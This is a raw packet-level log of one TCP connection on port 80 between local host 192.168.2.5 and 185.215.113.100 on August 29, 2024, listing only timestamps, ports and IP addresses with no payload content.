Aug 29, 2024 15:42:57.662811995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662820101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662839890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662851095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.662868023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662868023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.662895918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663033009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663044930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663053989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663058996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663070917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663088083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663104057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663105011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663117886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663119078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663130045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663140059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663149118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663151979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663167000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663171053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663180113 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663188934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663197994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663199902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663211107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663238049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663238049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663288116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663402081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663423061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663439989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663455009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663465023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663465023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663465977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663479090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663480043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663491011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663503885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663517952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663522005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663522005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663527966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663536072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663549900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663559914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663568974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663574934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663580894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663600922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663604975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663623095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663631916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663635015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663640976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663666010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663677931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663696051 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663702011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663712025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663737059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663737059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663755894 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663810968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663825989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663836002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663856030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663866997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.663868904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663868904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663897991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.663944006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664011002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664021969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664032936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664041996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664052010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664061069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664066076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664072037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664089918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664091110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664103031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664113998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664117098 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664124012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664134026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664150953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664177895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664191008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664211035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664222956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.664247990 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664247990 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.664283037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748349905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748434067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748446941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748485088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748511076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748524904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748555899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748567104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748573065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748613119 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748673916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748703003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748714924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748728037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748738050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748749971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748760939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748799086 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748800039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748848915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748861074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748871088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748882055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748898983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748913050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748924017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748924017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748935938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748944044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748946905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748960018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.748969078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748969078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.748971939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749013901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749058008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749142885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749160051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749171019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749177933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749182940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749188900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749201059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749214888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749244928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749283075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749831915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749845982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749860048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749871016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749881983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749892950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749911070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749911070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749911070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749933958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749938011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749947071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749963045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.749968052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749980927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.749990940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750001907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750014067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750020981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750020981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750026941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750037909 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750041008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750075102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750082016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750092983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750097990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750102997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750113010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750124931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750137091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750144958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750144958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750149012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750154972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750159979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750166893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750171900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750176907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750178099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750189066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750224113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750235081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750240088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750240088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750247002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750258923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750273943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750287056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750288010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750297070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750319958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750329971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750332117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750344992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750355959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750360966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750360966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750370979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750384092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750395060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750395060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750395060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750406981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750417948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750427008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750431061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750442982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750447989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750454903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750467062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750477076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750484943 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750488997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750494957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750502110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750514984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750518084 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750521898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750530005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750535011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750545979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750556946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750569105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750580072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750583887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750583887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750591993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750602007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750619888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750638008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750638008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750770092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750818014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750821114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750833035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750869989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750896931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750907898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750919104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750930071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.750965118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.750965118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751063108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751075029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751085043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751096010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751107931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751120090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751127005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751127005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751131058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751142979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751153946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751164913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751169920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751195908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751211882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751211882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751246929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751252890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751259089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751271009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751281977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.751322031 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.751322031 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836734056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836764097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836779118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836834908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836860895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836862087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836862087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836874008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836886883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836899042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836910963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836920023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836920023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836927891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836966038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836968899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836968899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.836978912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.836991072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837003946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837016106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837018013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837018013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837028980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837039948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837043047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837059021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837070942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837081909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837094069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837099075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837099075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837248087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837275028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837275028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837285995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837320089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837320089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837402105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837412119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837482929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837507963 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837538958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837563038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837593079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837604046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837626934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837627888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837642908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837655067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837666035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837687016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837687016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837723970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837734938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837745905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837765932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837771893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837765932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837786913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837791920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:57.837800980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:57.837826967 CEST	49704	80	192.168.2.5	185.215.113.100
